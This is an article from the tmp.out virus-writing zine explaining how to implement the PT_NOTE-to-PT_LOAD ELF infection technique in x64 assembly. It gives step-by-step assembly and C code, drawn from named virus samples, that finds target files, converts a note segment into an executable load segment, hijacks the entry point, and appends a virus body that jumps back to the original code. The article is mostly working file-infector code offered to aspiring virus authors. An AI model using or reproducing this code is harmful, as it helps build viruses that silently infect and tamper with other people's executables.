┌───────────────────────┐
                                                            ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄       │
                                                            │ █   █ █ █ █   █       │
                                                            │ █   █ █ █ █▀▀▀▀       │
                                                            │ █   █   █ █     ▄     │
                                                            │                 ▄▄▄▄▄ │
                                                            │                 █   █ │
                                                            │                 █   █ │
                                                            │                 █▄▄▄█ │
                                                            │                 ▄   ▄ │
                                                            │                 █   █ │
                                                            │                 █   █ │
                                                            │                 █▄▄▄█ │
                                                            │                 ▄▄▄▄▄ │
                                                            │                   █   │
Implementing the PT_NOTE Infection Method in x64 Assembly   │                   █   │
~ sblip and the tmp.out crew                                └───────────────────█ ──┘

In this first issue of tmp.out, we have supplied several examples of the
PT_NOTE->PT_LOAD infection algorithm, three in x64 asm and one in Rust. 
For those learning the craft I thought it useful to address implementing some of the 
specific steps in x64 assembly. In March 2019 while working on a golang rewrite of 
the backdoorfactory, I wrote a breakdown of implementing the algorithm in golang at 
the link below, for those interested in doing fun ELF things in golang:

  https://www.symbolcrash.com/2019/03/27/pt_note-to-pt_load-injection-in-elf/

The algorithm for x64 is of course the same, but I will provide some code 
snippets below that I hope will be of help to the aspiring x64 assembly ELF 
programmer. 

We can use the same steps listed in the above article as a reference, though the
order things are done in may change based on the implementation. Some methods write 
a new file to disk and then copy over it, while others write to the file directly.

From the above link, a generic list of steps to implement the PT_NOTE->PT_LOAD 
infection algorithm:

  1. Open the ELF file to be injected
  2. Save the original entry point, e_entry
  3. Parse the program header table, looking for a PT_NOTE segment
  4. Convert the PT_NOTE segment to a PT_LOAD segment
  5. Change the memory protections for this segment to allow executable instructions
  6. Change the entry point address to an area that will not conflict with the 
     original program execution.
  7. Adjust the size on disk and virtual memory size to account for the size of the 
     injected code
  8. Point the offset of our converted segment to the end of the original binary, 
     where we will store the new code
  9. Patch the end of the code with instructions to jump to the original entry point
 10. Add our injected code to the end of the file
*11. Write the file back to disk, over the original file* -- we will not cover this 
     implementation variant here, which creates a new temporary ELF binary on disk 
     and overwrites the host, as referenced above.

We will loosely follow the above steps. The reader should keep in mind that some of
them may be performed out of order (and some cannot be performed until others have),
but in the end all the steps must be taken.

1. Open the ELF file to be injected:

The getdents64() syscall is how we find files on 64 bit systems. The function
is defined as:

  int getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count);

We will leave implementing getdents64() as an exercise for the reader - There are 
several examples of it in the code distributed with this publication, including in 
Midrashim, kropotkin, Eng3ls, and Bak0unin.

For the ELF historians, I wrote a terrible (and now entirely outdated) article 20 
years ago about doing this in 32-bit AT&T syntax, located here:

  https://tmpout.sh/papers/getdents.old.att.syntax.txt

Assuming we have called getdents64() and stored the directory entries at the top of
the stack, each record has the following layout:

  struct linux_dirent64 {
      ino64_t        d_ino;     /* 64-bit inode number */
      off64_t        d_off;     /* 64-bit offset to next structure */
      unsigned short d_reclen;  /* Size of this dirent */
      unsigned char  d_type;    /* File type */
      char           d_name[];  /* Filename (null-terminated) */
  };

so the null terminated file name d_name of the first entry is at [rsp+19], or 
[rsp+0x13]:

  d_ino is bytes 0-7              - 64-bit inode number
  d_off is bytes 8-15             - 64-bit offset
  d_reclen is bytes 16-17         - unsigned short
  d_type is byte 18               - unsigned char
  d_name starts at byte 19        - null terminated file name

(The older getdents() syscall fills in struct linux_dirent instead, which has no 
d_type field in front of the name, so there d_name starts at byte 18.)

For our call to open(), int open(const char *pathname, int flags, mode_t mode);

  - rax will hold the syscall number, 2
  - rdi will hold a pointer to the file name d_name, in our case rsp+19
  - rsi will hold the flags, which could either be O_RDONLY (0) or O_RDWR (02), 
    depending on how our vx works
  - rdx would hold the mode, but we do not need this and will zero it out.

So the following code:

  mov rax, 2         ; open syscall
  lea rdi, [rsp+19]  ; pointer to d_name in the dirent record that starts at the 
                     ; top of the stack
  mov rsi, 2         ; O_RDWR / Read and Write
  xor rdx, rdx       ; mode is unused without O_CREAT
  syscall

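will return a file descriptor in rax if successful. On failure, rax holds a negative
errno value. A return of 0 is technically a valid descriptor, but only if stdin has
been closed, so treating it as a failure is harmless here.

  cmp rax, 0
  jng file_open_error      ; taken when rax <= 0

or, to reject only negative values:

  test rax, rax
  js file_open_error       ; taken when rax < 0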
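
The d_name offset is easy to double check from C. The following is only a sketch: 
the struct is declared locally to mirror the getdents64() record layout, and the two
helper names are my own invention, not part of any library.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Record layout written by getdents64(); declared locally for illustration. */
struct linux_dirent64 {
    uint64_t       d_ino;     /* bytes 0-7   */
    int64_t        d_off;     /* bytes 8-15  */
    unsigned short d_reclen;  /* bytes 16-17 */
    unsigned char  d_type;    /* byte  18    */
    char           d_name[];  /* byte  19 onward */
};

/* Hypothetical helper: name of the record that starts at buf + pos. */
static const char *dirent64_name(const unsigned char *buf, size_t pos)
{
    return (const char *)(buf + pos + offsetof(struct linux_dirent64, d_name));
}

/* Hypothetical helper: position of the record following the one at pos. */
static size_t dirent64_next(const unsigned char *buf, size_t pos)
{
    unsigned short reclen;
    memcpy(&reclen, buf + pos + offsetof(struct linux_dirent64, d_reclen),
           sizeof reclen);
    assert(reclen != 0);      /* a zero length would never advance */
    return pos + reclen;
}
```

Starting at pos = 0 and calling dirent64_next() until pos reaches the byte count 
returned by getdents64() visits every entry in the buffer.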

2. Save the original entry point, e_entry:

In TMZ's Midrashim, the target's ELF header is read into a buffer on the stack, and
the original entry point is then copied from that buffer into r14 for later use. The
high registers r13, r14, and r15 are good places to store data/addresses for later 
use, as they are not clobbered by syscalls (the syscall instruction itself only 
overwrites rax, rcx, and r11).

  ; Stack buffer:
  ; r15 + 0 = stack buffer (10000 bytes) = stat
  ; r15 + 48 = stat.st_size
  ; r15 + 144 = ehdr
  ; r15 + 148 = ehdr.class
  ; r15 + 152 = ehdr.pad
  ; r15 + 168 = ehdr.entry
  ---cut---
  
  mov r14, [r15 + 168]  ; storing target original ehdr.entry from [r15 + 168] in r14
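
The offsets in that stack layout follow directly from the ELF header: e_entry sits 
24 bytes into an Elf64_Ehdr, and 144 + 24 = 168. A minimal C sketch of the same read,
assuming glibc's <elf.h> is available (the helper name saved_entry is hypothetical):

```c
#include <assert.h>
#include <elf.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* e_entry is 24 bytes into the 64-bit ELF header. */
_Static_assert(offsetof(Elf64_Ehdr, e_entry) == 24, "unexpected Elf64_Ehdr layout");

/* Hypothetical helper: read e_entry out of a raw 64-bit ELF header image. */
static uint64_t saved_entry(const unsigned char *image, size_t len)
{
    Elf64_Ehdr eh;
    assert(len >= sizeof eh);          /* need the whole 64-byte header */
    memcpy(&eh, image, sizeof eh);
    return eh.e_entry;
}
```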

3. Parse the program header table, looking for the PT_NOTE segment:

As you probably intuited from the name of this article, our goal is to convert a 
PT_NOTE segment into a loadable PT_LOAD segment, with rx (or rwx) permissions.
I would be remiss not to mention that this algorithm does not work 
"cookie-cutter-out-of-the box" for some binaries such as golang binaries, and any
binaries compiled with the -fcf-protection flag, without even more magical fuckery
that we haven't done (or seen) yet. Next zine content, Every0ne? 

Aside from the edge cases, the basic concept is simple - PT_LOAD segments are 
actually loaded into memory when an ELF binary is run - PT_NOTE segments are not.
However, if we change a PT_NOTE segment to type PT_LOAD, and change the memory 
permissions to at least read and execute, we can put code that WE want to run there,
write our data to the end of the original file, and change the associated Program 
Header Table entry fields so that it is loaded correctly.

We put a value in the virtual address field p_vaddr that is very high in memory, which
won't interfere with normal program execution. We then patch the entry point in the
ELF header to point at our new PT_LOAD segment, so that our code runs first, does 
whatever it does, and then jumps to the original program code.

A 64-bit ELF Program Header Table entry has the following structure:

  typedef struct {
      uint32_t   p_type;   // 4 bytes
      uint32_t   p_flags;  // 4 bytes
      Elf64_Off  p_offset; // 8 bytes
      Elf64_Addr p_vaddr;  // 8 bytes
      Elf64_Addr p_paddr;  // 8 bytes
      uint64_t   p_filesz; // 8 bytes
      uint64_t   p_memsz;  // 8 bytes
      uint64_t   p_align;  // 8 bytes
  } Elf64_Phdr;


In this code snippet, adapted from kropotkin.s, we cycle through each program header
table entry by loading the offset of the PHT into rbx and the number of PHT entries 
into rcx, then reading the first 4 bytes of each entry looking for a value of 4,
which is the number designated for segments of type PT_NOTE.  

parse_phdr:
  xor rcx, rcx                       ; zero out rcx
  xor rdx, rdx                       ; zero out rdx
  mov cx, word [rax+e_hdr.phnum]     ; rcx contains the number of entries in the PHT
  mov rbx, qword [rax+e_hdr.phoff]   ; rbx contains the offset of the PHT
  mov dx, word [rax+e_hdr.phentsize] ; rdx contains the size of an entry in the PHT

  loop_phdr:
      cmp dword [rax+rbx+e_phdr.type], 0x4  ; if 4, we have found a PT_NOTE segment,
                                            ; and head off to infect it
      je pt_note_found
      add rbx, rdx                   ; otherwise, advance by the size of a PHT entry
      dec rcx                        ; decrease phnum until we've iterated through 
                                     ; all program headers
      jnz loop_phdr
      ...
      ...
  pt_note_found:
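
For comparison, here is roughly the same walk over the PHT in C. This is a sketch 
that assumes glibc's <elf.h> and a target already read into memory; find_pt_note is 
a hypothetical helper name, not something from the vx sources.

```c
#include <assert.h>
#include <elf.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: return the file offset of the first PT_NOTE program
   header in a 64-bit ELF image, or -1 if there is none. */
static long find_pt_note(const unsigned char *image, size_t len)
{
    Elf64_Ehdr eh;
    assert(image != NULL);
    if (len < sizeof eh)
        return -1;
    memcpy(&eh, image, sizeof eh);
    if (eh.e_phentsize < sizeof(Elf64_Phdr))
        return -1;

    for (uint16_t i = 0; i < eh.e_phnum; i++) {
        uint64_t off = eh.e_phoff + (uint64_t)i * eh.e_phentsize;
        Elf64_Phdr ph;
        if (off > len || len - off < sizeof ph)
            return -1;                 /* table runs past the image */
        memcpy(&ph, image + off, sizeof ph);
        if (ph.p_type == PT_NOTE)      /* PT_NOTE == 4 */
            return (long)off;
    }
    return -1;
}
```

The bounds check on every entry is the part that is easiest to forget in assembly,
where a bad e_phnum simply walks off the end of the buffer.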

4. Convert the PT_NOTE segment to a PT_LOAD segment:

To convert a PT_NOTE segment into a PT_LOAD segment, we must change a few values in
the Program Header Table entry that describes the segment.

Note that 32-bit ELF binaries have a different PHT entry structure, with the p_flags
value as the 7th entry in the struct, as opposed to being the 2nd entry in its 64-bit
counterpart.

  typedef struct {
      uint32_t   p_type;  <-- Change this value to PT_LOAD == 1
      uint32_t   p_flags; <-- Change to at least Read+Execute permissions
      Elf64_Off  p_offset;
      Elf64_Addr p_vaddr; <-- very high virtual addr where the segment will be loaded
      Elf64_Addr p_paddr;
      uint64_t   p_filesz;
      uint64_t   p_memsz;
      uint64_t   p_align;
  } Elf64_Phdr;

First, the p_type must be changed from PT_NOTE, which is 4, to PT_LOAD, which is 1.

Second, the p_flags must be changed to, at the very least, allow Read and Execute 
access. This is a standard bitmask just like unix file permissions, with

  PF_X == 1
  PF_W == 2
  PF_R == 4

In fasm syntax, as seen below, this is done simply by typing "PF_R or PF_X"

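Third, we need to choose an address at which the new virus data will be loaded. A 
common technique is to pick a high base address, 0xc000000, that is unlikely to 
overlap with an existing segment, and add the target's file size (stat.st_size) to 
it. In the code below, the file size is retrieved from r15+48 into r13, 0xc000000 is
added, and the result is stored in p_vaddr. Because p_offset is set to the old end of
file (also stat.st_size) and 0xc000000 is a multiple of the 2mb p_align, p_vaddr and
p_offset stay congruent modulo p_align, as the ELF specification requires of loadable
segments.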

From TMZ's Midrashim:

  .patch_phdr:
    mov dword [r15 + 208], PT_LOAD              ; change phdr type in [r15 + 208] 
                                                ;  from PT_NOTE to PT_LOAD (1)
    mov dword [r15 + 212], PF_R or PF_X         ; change phdr.flags in [r15 + 212] 
                                                ;  to PF_X (1) | PF_R (4)
    pop rax                                     ; restore target EOF offset into rax
    mov [r15 + 216], rax                        ; phdr.offset [r15 + 216] = target 
                                                ;  EOF offset
    mov r13, [r15 + 48]                         ; storing target stat.st_size from 
                                                ;  [r15 + 48] in r13
    add r13, 0xc000000                          ; add 0xc000000 to target file size
    mov [r15 + 224], r13                        ; changing phdr.vaddr in [r15 + 224]
                                                ;  to new one in r13 
                                                ;  (stat.st_size + 0xc000000)
    mov qword [r15 + 256], 0x200000             ; set phdr.align [r15 + 256] to 2mb
    add qword [r15 + 240], v_stop - v_start + 5 ; add virus size to phdr.filesz in 
                                                ;  [r15 + 240] + 5 for the jmp to 
                                                ;  original ehdr.entry
    add qword [r15 + 248], v_stop - v_start + 5 ; add virus size to phdr.memsz in 
                                                ;  [r15 + 248] + 5 for the jmp to 
                                                ;  original ehdr.entry
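
The same header patch can be sketched in C, which makes the field-by-field changes a
little easier to see. This assumes glibc's <elf.h>; note_to_load and the three 
constants are hypothetical names chosen for this example, with values taken from the 
listing above.

```c
#include <assert.h>
#include <elf.h>
#include <stdint.h>

#define VX_BASE  0xc000000ULL  /* same base address as the listing above */
#define VX_ALIGN 0x200000ULL   /* 2mb, as in the listing above */
#define JMP_LEN  5ULL          /* e9 opcode + rel32 */

/* Hypothetical helper: turn a PT_NOTE header into a PT_LOAD that maps
   payload_len bytes stored at the old end of file (file_size). */
static void note_to_load(Elf64_Phdr *ph, uint64_t file_size, uint64_t payload_len)
{
    assert(ph->p_type == PT_NOTE);
    ph->p_type    = PT_LOAD;               /* 4 -> 1 */
    ph->p_flags   = PF_R | PF_X;           /* 4 | 1 == 5 */
    ph->p_offset  = file_size;             /* payload goes at the old EOF */
    ph->p_vaddr   = VX_BASE + file_size;   /* congruent to p_offset mod p_align */
    ph->p_align   = VX_ALIGN;
    ph->p_filesz += payload_len + JMP_LEN; /* added to the existing size, */
    ph->p_memsz  += payload_len + JMP_LEN; /* mirroring the listing above */
}
```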

5. Change the memory protections for this segment to allow executable instructions:

    mov dword [r15 + 212], PF_R or PF_X         ; change phdr.flags in [r15 + 212] 
                                                ;  to PF_X (1) | PF_R (4)

6. Change the entry point address to an area that will not conflict with the original
   program execution. We'll use 0xc000000 plus the file size, an address high enough
   in virtual memory that when loaded it does not overlap other code. The snippet 
   below sets the segment's p_vaddr; e_entry in the ELF header must then be set to
   the same address.

    mov r13, [r15 + 48]     ; storing target stat.st_size from [r15 + 48] in r13
    add r13, 0xc000000      ; adding 0xc000000 to target file size
    mov [r15 + 224], r13    ; changing phdr.vaddr in [r15 + 224] to new one in r13 
                            ;  (stat.st_size + 0xc000000)
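
The entry point change itself is a single store into the ELF header. As a hedged C 
sketch (assuming glibc's <elf.h>; redirect_entry is a hypothetical helper name), the
step amounts to:

```c
#include <assert.h>
#include <elf.h>
#include <stdint.h>

/* Hypothetical helper: point e_entry at the converted segment and hand back
   the original entry point so the payload can jump to it later. */
static uint64_t redirect_entry(Elf64_Ehdr *eh, const Elf64_Phdr *ph)
{
    assert(ph->p_type == PT_LOAD && (ph->p_flags & PF_X));
    uint64_t original = eh->e_entry;   /* the value saved in step 2 */
    eh->e_entry = ph->p_vaddr;         /* execution now starts in our segment */
    return original;
}
```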

7. Adjust the size on disk and virtual memory size to account for the size of the 
   injected code

    add qword [r15 + 240], v_stop - v_start + 5  ; add virus size to phdr.filesz in
                                                 ;  [r15 + 240] + 5 for the jmp to 
                                                 ;  original ehdr.entry
    add qword [r15 + 248], v_stop - v_start + 5  ; add virus size to phdr.memsz in
                                                 ;  [r15 + 248] + 5 for the jmp to
                                                 ;  original ehdr.entry

8. Point the offset of our converted segment to the end of the original binary, 
   where we will store the new code:

   Previously in Midrashim, this code was executed:
    
    mov rdx, SEEK_END
    mov rax, SYS_LSEEK
    syscall                ; getting target EOF offset in rax
    push rax               ; saving target EOF

   In .patch_phdr, we use this value as the location for storing our new code:

    pop rax                ; restoring target EOF offset into rax
    mov [r15 + 216], rax   ; phdr.offset [r15 + 216] = target EOF offset


9. Patch the end of the code with instructions to jump to the original entry point:

   Example #1, from Midrashim, using algorithm from Binjection:

    .write_patched_jmp:
      ; getting target new EOF
      mov rdi, r9            ; r9 contains fd
      mov rsi, 0             ; seek offset 0
      mov rdx, SEEK_END      ; start at the end of the file
      mov rax, SYS_LSEEK     ; lseek syscall
      syscall                ; getting target EOF offset in rax

      ; creating patched jmp
      mov rdx, [r15 + 224]         ; rdx = phdr.vaddr
      add rdx, 5                   ; the size of a jmp instruction
      sub r14, rdx                 ; r14 = e_entry (saved in step #2) minus 
                                   ;  (phdr.vaddr + 5)
      sub r14, v_stop - v_start    ; subtract the size of the virus code itself
      mov byte [r15 + 300], 0xe9   ; opcode of the jmp rel32 instruction
      mov dword [r15 + 301], r14d  ; rel32 displacement from the end of the jmp
                                   ;  back to the original entry point
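
The arithmetic is worth spelling out: a jmp rel32 is relative to the address of the 
instruction after it, so the displacement is e_entry - (p_vaddr + virus size + 5). A 
small C sketch of the same calculation, where encode_jmp_back is a hypothetical 
helper and the jmp is assumed to sit directly after the virus body:

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: write "jmp rel32" into out[0..4]. The jump is assumed
   to sit right after a payload of payload_len bytes loaded at vaddr. */
static void encode_jmp_back(unsigned char out[5], uint64_t vaddr,
                            uint64_t payload_len, uint64_t original_entry)
{
    uint64_t next_ip = vaddr + payload_len + 5;   /* address after the jmp */
    int64_t  disp    = (int64_t)(original_entry - next_ip);
    assert(disp >= INT32_MIN && disp <= INT32_MAX);
    int32_t  rel32   = (int32_t)disp;
    out[0] = 0xe9;                                /* jmp rel32 opcode */
    memcpy(out + 1, &rel32, sizeof rel32);        /* little-endian on x86-64 */
}
```

With p_vaddr = 0xc004000, a 0x100 byte payload, and e_entry = 0x401000, the 
displacement is 0x401000 - 0xc004105, a negative value, since the original code 
lives below the new segment.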

   Example #2, from sblip/s01den vx's, using elfmaster's OEP technique:

    Explaining this method is beyond the scope of this document - for reference:

      https://tmpout.sh/1/11.html

   The code from kropotkin.s:
   
       mov rcx, r15                    ; saved rsp
       add rcx, VXSIZE
       mov dword [rcx], 0xffffeee8     ; relative call to get_eip
       mov dword [rcx+4], 0x0d2d48ff   ; sub rax, (VXSIZE+5)
       mov byte  [rcx+8], 0x00000005 
       mov word  [rcx+11], 0x0002d48
       mov qword [rcx+13], r9          ; sub rax, entry0  
       mov word  [rcx+17], 0x0000548
       mov qword [rcx+19], r12         ; add rax, sym._start
       mov dword [rcx+23], 0xfff4894c  ; mov rsp, r14 (4c 89 f4), then 0xff
       mov word  [rcx+27], 0x00e0      ; 0xe0 completes ff e0 = jmp rax

10. Add our injected code to the end of the file:

From Midrashim:

  We append our code directly to the end of the file, which is where the p_offset
  of the converted PT_LOAD segment points. First we use the lseek syscall to seek
  to the end of the file whose descriptor is held in r9. 'call .delta' pushes the
  address of the next instruction, in this case 'pop rbp', onto the stack. Popping
  that address into rbp and subtracting the assemble-time address of .delta leaves
  in rbp the difference between where the code is running and where it was 
  assembled to run. Adding rbp to any label, as in 'lea rsi, [rbp + v_start]', 
  yields that label's runtime address, here the start of the bytes to be written.
  The number of bytes to write is put in rdx before the call to pwrite64().

  .append_virus:
    ; getting target EOF
    mov rdi, r9               ; r9 contains fd
    mov rsi, 0                ; seek offset 0
    mov rdx, SEEK_END         ; start at the end of the file
    mov rax, SYS_LSEEK        ; lseek syscall
    syscall                   ; getting target EOF offset in rax
    push rax                  ; saving target EOF

    call .delta               ; the age old trick
    .delta:
        pop rbp
        sub rbp, .delta

    ; writing virus body to EOF
    mov rdi, r9               ; r9 contains fd
    lea rsi, [rbp + v_start]  ; loading v_start address in rsi
    mov rdx, v_stop - v_start ; virus size
    mov r10, rax              ; rax contains target EOF offset from previous syscall
    mov rax, SYS_PWRITE64     ; syscall #18, pwrite()
    syscall
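
The lseek + pwrite pair translates almost line for line into C. The following is a 
sketch using the libc wrappers rather than raw syscalls; append_at_eof is a 
hypothetical helper name.

```c
#define _XOPEN_SOURCE 700
#include <assert.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: append len bytes to fd and return the offset they
   were written at (the old end of file), or -1 on error. */
static off_t append_at_eof(int fd, const void *payload, size_t len)
{
    off_t eof = lseek(fd, 0, SEEK_END);         /* target EOF offset */
    if (eof < 0) {
        perror("lseek");
        return -1;
    }
    ssize_t n = pwrite(fd, payload, len, eof);  /* write at that offset */
    if (n < 0 || (size_t)n != len) {
        perror("pwrite");
        return -1;
    }
    return eof;
}
```

The returned offset is the value that belongs in p_offset of the converted segment.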

The PT_NOTE infection algorithm has the benefit of being fairly easy to learn, as
well as being very versatile. It can be combined with other techniques and any manner
of data may be stored in a converted PT_LOAD segment, including symbol tables, raw 
data, code for a DT_NEEDED object, or even an entirely separate ELF binary. I hope 
this article proves useful to anyone learning x64 assembly language for the purposes
of playing with ELF binaries.